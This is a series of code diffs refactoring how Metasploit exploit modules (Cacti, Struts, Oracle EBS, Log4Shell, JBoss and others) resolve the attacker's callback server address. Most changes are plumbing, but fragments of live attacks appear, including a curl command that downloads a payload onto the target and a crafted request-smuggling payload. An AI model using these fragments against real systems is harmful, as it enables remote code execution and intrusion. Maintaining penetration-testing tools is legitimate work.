+    @service_url = "http:\\x2f\\x2f#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri}"
+    print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
     start_service({
       'Uri' => {
         'Proc' => Proc.new { |cli, req|

--- a/modules/exploits/multi/http/bassmaster_js_injection.rb
+++ b/modules/exploits/multi/http/bassmaster_js_injection.rb
@@ -142,10 +142,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @elf_sent = false
     downfile = rand_text_alpha(8 + rand(8))
     resource_uri = "\\x2f#{downfile}"
-    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+    if (srvhost == "0.0.0.0" or srvhost == "::")
       srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     @service_url = "http:\\x2f\\x2f#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"

--- a/modules/exploits/multi/http/cacti_graph_template_rce.rb
+++ b/modules/exploits/multi/http/cacti_graph_template_rce.rb
@@ -282,7 +282,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super
 
     if Rex::Socket.is_ipv6?(srvhost_addr)
-      raise Msf::OptionValidateError({'SRVHOST' => 'The SRVHOST option must be set to an IPv4 address, as an IPv6 address exceeds the 47 character payload length limitation of this exploit.'})
+      raise Msf::OptionValidateError({ 'SRVHOST' => 'The SRVHOST option must be set to an IPv4 address, as an IPv6 address exceeds the 47 character payload length limitation of this exploit.' })
     end
   end
 

--- a/modules/exploits/multi/http/cacti_graph_template_rce.rb
+++ b/modules/exploits/multi/http/cacti_graph_template_rce.rb
@@ -78,7 +78,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
         OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),
         OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti']),

--- a/modules/exploits/multi/http/cacti_graph_template_rce.rb
+++ b/modules/exploits/multi/http/cacti_graph_template_rce.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
         OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),
         OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti']),
@@ -279,14 +279,15 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def validate_configuration!
-    if Rex::Socket.is_ipv6?(srvhost)
-      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to an IPv4 address, as an IPv6 address exceeds the 47 character payload length limitation of this exploit.')
+  def validate
+    super
+
+    if Rex::Socket.is_ipv6?(srvhost_addr)
+      raise Msf::OptionValidateError({'SRVHOST' => 'The SRVHOST option must be set to an IPv4 address, as an IPv6 address exceeds the 47 character payload length limitation of this exploit.'})
     end
   end
 
   def exploit
-    validate_configuration!
     authenticate
     hosted_payload_name = Rex::Text.rand_text_alpha_lower(1)
     start_service('Path' => "/#{hosted_payload_name}", 'ssl' => false)
@@ -305,7 +306,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Payload execution command: #{execute_payload_command}")
 
     # upload_payload_command must not exceed 47 characters or the exploit will fail, this is why 1 character payload names are used, SSL is disabled and IPv6 addresses for SRVHOST are not supported
-    upload_payload_command = "curl\\x20#{srvhost}\\x3a#{datastore['SRVPORT']}/#{hosted_payload_name}\\x20-o\\x20#{on_disk_payload_name}"
+    upload_payload_command = "curl\\x20#{srvhost_addr}\\x3a#{srvport}/#{hosted_payload_name}\\x20-o\\x20#{on_disk_payload_name}"
     fail_with(Exploit::Failure::BadConfig, "The generated upload command length of: #{upload_payload_command.length}, exceeds the 47 character limit, please attempt to shorten either SRVHOST or SRVPORT") if upload_payload_command.length > 47
     upload_stage(upload_payload_command)
     execute_stage(execute_payload_command)

--- a/modules/exploits/multi/http/cacti_graph_template_rce.rb
+++ b/modules/exploits/multi/http/cacti_graph_template_rce.rb
@@ -280,7 +280,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def validate_configuration!
-    if Rex::Socket.is_ipv6?(datastore['SRVHOST'])
+    if Rex::Socket.is_ipv6?(srvhost)
       fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to an IPv4 address, as an IPv6 address exceeds the 47 character payload length limitation of this exploit.')
     end
   end
@@ -305,7 +305,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Payload execution command: #{execute_payload_command}")
 
     # upload_payload_command must not exceed 47 characters or the exploit will fail, this is why 1 character payload names are used, SSL is disabled and IPv6 addresses for SRVHOST are not supported
-    upload_payload_command = "curl\\x20#{datastore['SRVHOST']}\\x3a#{datastore['SRVPORT']}/#{hosted_payload_name}\\x20-o\\x20#{on_disk_payload_name}"
+    upload_payload_command = "curl\\x20#{srvhost}\\x3a#{datastore['SRVPORT']}/#{hosted_payload_name}\\x20-o\\x20#{on_disk_payload_name}"
     fail_with(Exploit::Failure::BadConfig, "The generated upload command length of: #{upload_payload_command.length}, exceeds the 47 character limit, please attempt to shorten either SRVHOST or SRVPORT") if upload_payload_command.length > 47
     upload_stage(upload_payload_command)
     execute_stage(execute_payload_command)

--- a/modules/exploits/multi/http/cacti_graph_template_rce.rb
+++ b/modules/exploits/multi/http/cacti_graph_template_rce.rb
@@ -78,6 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
         OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),
         OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti']),
@@ -279,10 +280,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def validate_configuration!
-    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
-      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
-    end
-
     if Rex::Socket.is_ipv6?(datastore['SRVHOST'])
       fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to an IPv4 address, as an IPv6 address exceeds the 47 character payload length limitation of this exploit.')
     end

--- a/modules/exploits/multi/http/cacti_graph_template_rce.rb
+++ b/modules/exploits/multi/http/cacti_graph_template_rce.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           [ 'URL', 'https://github.com/SoftAndoWetto/CVE-2025-24367-PoC-Cacti/blob/main/exploit.py'],
-          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-fxrq-fr7h-9rqq'],
+          [ 'GHSA', 'fxrq-fr7h-9rqq'],
           [ 'CVE', '2025-24367'],
         ],
         'Privileged' => false,

--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -160,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # UPLOAD
     #
     resource_uri = '/' + app_base + '.war'
-    service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+    service_url = 'http://' + srvhost + ':' + datastore['SRVPORT'].to_s + resource_uri
     print_status("Starting up our web service on #{service_url} ...")
     start_service({
       'Uri' => {

--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -96,9 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
         OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),
         OptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]),
-        OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]),
         OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'GET', ['GET', 'POST', 'HEAD']])
-
       ]
     )
   end
@@ -160,8 +158,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # UPLOAD
     #
     resource_uri = '/' + app_base + '.war'
-    service_url = 'http://' + srvhost + ':' + datastore['SRVPORT'].to_s + resource_uri
-    print_status("Starting up our web service on #{service_url} ...")
+    service_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri}"
+    print_status("Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}#{resource_uri}...")
     start_service({
       'Uri' => {
         'Proc' => proc do |cli, req|

--- a/modules/exploits/multi/http/log4shell_header_injection.rb
+++ b/modules/exploits/multi/http/log4shell_header_injection.rb
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def resource_url_string
-    "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"
+    "http#{datastore['SSL'] ? 's' : ''}://#{srvhost}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"
   end
 
   #

--- a/modules/exploits/multi/http/log4shell_header_injection.rb
+++ b/modules/exploits/multi/http/log4shell_header_injection.rb
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def resource_url_string
-    "http#{datastore['SSL'] ? 's' : ''}://#{srvhost}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"
+    "http#{datastore['SSL'] ? 's' : ''}://#{Rex::Socket.to_authority(srvhost_addr, datastore['HTTP_SRVPORT'])}#{resource_uri}"
   end
 
   #
@@ -284,11 +284,7 @@ class MetasploitModule < Msf::Exploit::Remote
     netloc = opts['ServerHost'] || bindhost
     http_srvport = (opts['ServerPort'] || bindport).to_i
     if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)
-      if Rex::Socket.is_ipv6?(netloc)
-        netloc = "[#{netloc}]:#{http_srvport}"
-      else
-        netloc = "#{netloc}:#{http_srvport}"
-      end
+      netloc = Rex::Socket.to_authority(netloc, http_srvport)
     end
     print_status("Serving Java code on: #{proto}://#{netloc}#{uopts['Path']}")
 

--- a/modules/exploits/multi/http/monsta_ftp_downloadfile_rce.rb
+++ b/modules/exploits/multi/http/monsta_ftp_downloadfile_rce.rb
@@ -212,11 +212,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => "request=#{Rex::Text.uri_encode({
         'connectionType' => 'ftp',
         'configuration' => {
-          'host' => srvhost,
+          'host' => srvhost_addr,
           'username' => exploit_data[:user],
           'initialDirectory' => '/',
           'password' => exploit_data[:pass],
-          'port' => datastore['SRVPORT']
+          'port' => srvport
         },
         'actionName' => 'downloadFile',
         'context' => { 'remotePath' => "/#{payload_name}", 'localPath' => payload_name }
@@ -236,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     start_ftp_service(exploit_data)
-    vprint_status("FTP server started on #{srvhost}:#{datastore['SRVPORT']}")
+    vprint_status("FTP server started on #{bindhost}:#{bindport}")
 
     payload_name = trigger_http_request(exploit_data)
     fail_with(Failure::Unknown, 'Failed to download payload file') unless payload_name

--- a/modules/exploits/multi/http/monsta_ftp_downloadfile_rce.rb
+++ b/modules/exploits/multi/http/monsta_ftp_downloadfile_rce.rb
@@ -212,7 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => "request=#{Rex::Text.uri_encode({
         'connectionType' => 'ftp',
         'configuration' => {
-          'host' => datastore['SRVHOST'],
+          'host' => srvhost,
           'username' => exploit_data[:user],
           'initialDirectory' => '/',
           'password' => exploit_data[:pass],
@@ -236,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     start_ftp_service(exploit_data)
-    vprint_status("FTP server started on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+    vprint_status("FTP server started on #{srvhost}:#{datastore['SRVPORT']}")
 
     payload_name = trigger_http_request(exploit_data)
     fail_with(Failure::Unknown, 'Failed to download payload file') unless payload_name

--- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
+++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
@@ -86,10 +86,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def lookup_lhost
     # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       Rex::Socket.source_address('50.50.50.50')
     else
-      datastore['SRVHOST']
+      srvhost
     end
   end
 

--- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
+++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
@@ -84,15 +84,6 @@ class MetasploitModule < Msf::Exploit::Remote
     self.needs_cleanup = true
   end
 
-  def lookup_lhost
-    # Get the source address
-    if srvhost == '0.0.0.0'
-      Rex::Socket.source_address('50.50.50.50')
-    else
-      srvhost
-    end
-  end
-
   def on_new_session(session)
     cmds = []
     if @netmask_eth0
@@ -123,9 +114,9 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Setting up the Web Service...')
 
     resource_uri = '/' + @elfname + '.elf'
-    service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}"
+    service_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri}"
 
-    print_status("Starting up our web service on #{service_url} ...")
+    print_status("Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
     start_service({
       'Uri' => {
         'Proc' => proc do |cli, req|

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -79,7 +79,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       Opt::RPORT(8000),
       OptString.new('TARGETURI', [true, 'Base path to Oracle EBS', '/']),
-      OptString.new('SRVHOST', [true, 'The local host to listen on for XSL callback', '0.0.0.0']),
       OptPort.new('SRVPORT', [true, 'The local port to listen on for XSL callback', 8080]),
       OptInt.new('HTTP_TIMEOUT', [true, 'Time to wait for target to fetch XSL (seconds)', 20]),
       OptInt.new('SHELL_TIMEOUT', [true, 'Time to wait for shell after XSL delivery (seconds)', 30])
@@ -179,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @session_created = false
 
     # Step 1 : Start HTTP server for XSL file serving
-    print_status("Starting HTTP server on #{srvhost}:#{datastore['SRVPORT']}")
+    print_status("Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
     start_service(
       'Uri' => {
         'Proc' => proc { |cli, request| on_request_uri(cli, request) },
@@ -267,13 +266,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_smuggle_payload
-    srvhost = srvhost
-    srvport = datastore['SRVPORT']
-
-    srvhost = Rex::Socket.source_address(rhost) if srvhost == '0.0.0.0'
+    netloc = Rex::Socket.to_authority(srvhost_addr, srvport)
 
     smuggle_request = "POST /OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.2\r\n"
-    smuggle_request += "Host: #{srvhost}:#{srvport}\r\n"
+    smuggle_request += "Host: #{netloc}\r\n"
     smuggle_request += "User-Agent: #{Rex::Text.rand_text_alpha(10)}\r\n"
     smuggle_request += "Connection: keep-alive\r\n"
 
@@ -284,7 +280,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Add POST request via CRLF
     smuggle_request += "\r\n\r\n\r\nPOST /"
 
-    vprint_status("Smuggled request will target: #{srvhost}:#{srvport}")
+    vprint_status("Smuggled request will target: #{netloc}")
     vprint_status('Full smuggled request:')
     vprint_line(smuggle_request) if datastore['VERBOSE']
 

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @session_created = false
 
     # Step 1 : Start HTTP server for XSL file serving
-    print_status("Starting HTTP server on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+    print_status("Starting HTTP server on #{srvhost}:#{datastore['SRVPORT']}")
     start_service(
       'Uri' => {
         'Proc' => proc { |cli, request| on_request_uri(cli, request) },
@@ -267,7 +267,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_smuggle_payload
-    srvhost = datastore['SRVHOST']
+    srvhost = srvhost
     srvport = datastore['SRVPORT']
 
     srvhost = Rex::Socket.source_address(rhost) if srvhost == '0.0.0.0'

--- a/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb
+++ b/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb
@@ -161,10 +161,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @elf_sent = false
     downfile = rand_text_alpha(8 + rand(8))
     resource_uri = '/' + downfile
-    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+    if (srvhost == "0.0.0.0" or srvhost == "::")
       srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"

--- a/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb
+++ b/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb
@@ -161,15 +161,9 @@ class MetasploitModule < Msf::Exploit::Remote
     @elf_sent = false
     downfile = rand_text_alpha(8 + rand(8))
     resource_uri = '/' + downfile
-    if (srvhost == "0.0.0.0" or srvhost == "::")
-      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
-    else
-      srv_host = srvhost
-    end
 
-    @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
-    service_url_payload = srv_host + resource_uri
-    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
+    @service_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri}"
+    print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
     start_service({
       'Uri' => {
         'Proc' => Proc.new { |cli, req|

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -93,8 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('TARGETURI', [true, 'Base path', '/']),
-      OptAddressRoutable.new('SRVHOST', [false, 'The local host or network interface to listen on. This must be an address on the local machine'])
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
     ])
   end
 

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/']),
-      OptAddressLocal.new('SRVHOST', [false, 'The local host or network interface to listen on. This must be an address on the local machine.', nil])
+      OptAddressRoutable.new('SRVHOST', [false, 'The local host or network interface to listen on. This must be an address on the local machine'])
     ])
   end
 
@@ -183,17 +183,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # overcome this, we wrap the SMB server mixin in a new Exploit class, and instantiate it separately.
     return nil unless target['VersionStart'] == '12.8' && session_ctx[:platform] == :windows
 
-    # XXX: Determine SRVHOST based on global SRVHOST, RHOST or an arbitrary internet address so that it is a bindable, and hopefully routable address
-    #      Original pattern from: https://github.com/rapid7/metasploit-framework/blob/c0f73038f3fb4f76b4ed8a0c661be35639a9d1fc/lib/msf/core/payload.rb#L474-L475
-    #      Related: https://github.com/rapid7/metasploit-framework/issues/20986
-    srvhost = datastore['SRVHOST'] || Rex::Socket.source_address(datastore['RHOST'] || '50.50.50.50')
-
-    if Rex::Socket.is_ip_addr?(srvhost) && Rex::Socket.addr_atoi(srvhost) == 0
-      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
-    end
-
     # NOTE: It has to be TCP port 445 for SMB, so we don't expose this port number to the user as an option.
-    print_status("Serving a malicious extension over an SMB share on #{srvhost} (SMB on TCP port 445)")
+    print_status("Serving a malicious extension over an SMB share on #{bindhost} (SMB on TCP port 445)")
 
     smb_service = SimpleSMBShareWrapper.new
 

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -94,7 +94,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/']),
-      # XXX: Ticket to improve this option across multiple modules: https://github.com/rapid7/metasploit-framework/issues/20986
       OptAddressLocal.new('SRVHOST', [false, 'The local host or network interface to listen on. This must be an address on the local machine.', nil])
     ])
   end

--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 

--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -98,9 +98,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def windows_stager
-    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    execute_cmdstager({ temp: '.', tftphost: tftphost })
+    print_status("Sending request to #{Rex::Socket.to_authority(datastore['RHOST'], datastore['RPORT'])}")
+    execute_cmdstager({ temp: '.', tftphost: srvhost_addr })
     @payload_exe = generate_payload_exe
 
     print_status('Attempting to execute the payload...')

--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand_text_alphanumeric(rand(4..7))
 
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 

--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -109,9 +109,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def windows_stager
     rand_text_alphanumeric(rand(4..7))
 
-    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    execute_cmdstager({ temp: '.', tftphost: tftphost })
+    print_status("Sending request to #{Rex::Socket.to_authority(datastore['RHOST'], datastore['RPORT'])}")
+    execute_cmdstager({ temp: '.', tftphost: srvhost_addr })
     @payload_exe = generate_payload_exe
 
     print_status('Attempting to execute the payload...')

--- a/modules/exploits/multi/http/struts_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_default_action_mapper.rb
@@ -119,14 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def start_http_service
-    if (srvhost == '0.0.0.0' or srvhost == '::')
-      srv_host = Rex::Socket.source_address(rhost)
-    else
-      srv_host = srvhost
-    end
-
-    service_url = srv_host + ':' + datastore['SRVPORT'].to_s
-    print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+    print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/...")
     start_service({
       'Uri' => {
         'Proc' => proc do |cli, req|
@@ -137,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'ssl' => false # do not use SSL
     })
 
-    return service_url
+    return Rex::Socket.to_authority(srvhost_addr, srvport)
   end
 
   def check

--- a/modules/exploits/multi/http/struts_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_default_action_mapper.rb
@@ -119,10 +119,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def start_http_service
-    if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+    if (srvhost == '0.0.0.0' or srvhost == '::')
       srv_host = Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     service_url = srv_host + ':' + datastore['SRVPORT'].to_s

--- a/modules/exploits/multi/http/totaljs_cms_widget_exec.rb
+++ b/modules/exploits/multi/http/totaljs_cms_widget_exec.rb
@@ -157,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def create_widget(admin_token)
     platform = target.platform.names.first
-    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST']
+    host = srvhost == '0.0.0.0' ? Rex::Socket::source_address : srvhost
     port = datastore['SRVPORT']
     proto = datastore['SSL'] ? 'https' : 'http'
     payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"

--- a/modules/exploits/multi/http/totaljs_cms_widget_exec.rb
+++ b/modules/exploits/multi/http/totaljs_cms_widget_exec.rb
@@ -157,11 +157,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def create_widget(admin_token)
     platform = target.platform.names.first
-    host = srvhost == '0.0.0.0' ? Rex::Socket::source_address : srvhost
-    port = datastore['SRVPORT']
     proto = datastore['SSL'] ? 'https' : 'http'
     payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"
-    url = "#{proto}://#{host}:#{port}#{get_resource}/#{payload_name}"
+    url = "#{proto}://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{get_resource}/#{payload_name}"
     widget = Widget.new(platform, url, generate_cmdstager(
       'Path' => "#{get_resource}/#{payload_name}",
       'temp' => '/tmp',

--- a/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb
+++ b/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb
@@ -157,10 +157,10 @@ class MetasploitModule < Msf::Exploit::Remote
     downfile = rand_text_alpha(8 + rand(8))
     resource_uri = '/' + downfile
 
-    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+    if (srvhost == "0.0.0.0" or srvhost == "::")
       srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb
+++ b/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb
@@ -157,16 +157,9 @@ class MetasploitModule < Msf::Exploit::Remote
     downfile = rand_text_alpha(8 + rand(8))
     resource_uri = '/' + downfile
 
-    if (srvhost == "0.0.0.0" or srvhost == "::")
-      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
-    else
-      srv_host = srvhost
-    end
+    @service_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri}"
 
-    @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-    service_url_payload = srv_host + resource_uri
-
-    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
+    print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
     start_service({
       'Uri' => {
         'Proc' => Proc.new { |cli, req|

--- a/modules/exploits/multi/http/wondercms_rce.rb
+++ b/modules/exploits/multi/http/wondercms_rce.rb
@@ -56,7 +56,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
       OptString.new('TARGETURI', [true, 'Path to the WonderCMS application', '/wondercms']),
       OptString.new('PASSWORD', [true, 'Password to log into WonderCMS', '']),
       OptBool.new('CLEANUP', [false, 'Enable payload file cleanup', true])

--- a/modules/exploits/multi/http/wondercms_rce.rb
+++ b/modules/exploits/multi/http/wondercms_rce.rb
@@ -56,6 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
+      OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
       OptString.new('TARGETURI', [true, 'Path to the WonderCMS application', '/wondercms']),
       OptString.new('PASSWORD', [true, 'Password to log into WonderCMS', '']),
       OptBool.new('CLEANUP', [false, 'Enable payload file cleanup', true])
@@ -148,10 +149,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
-      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
-    end
-
     login
 
     create_vulnerable_zip

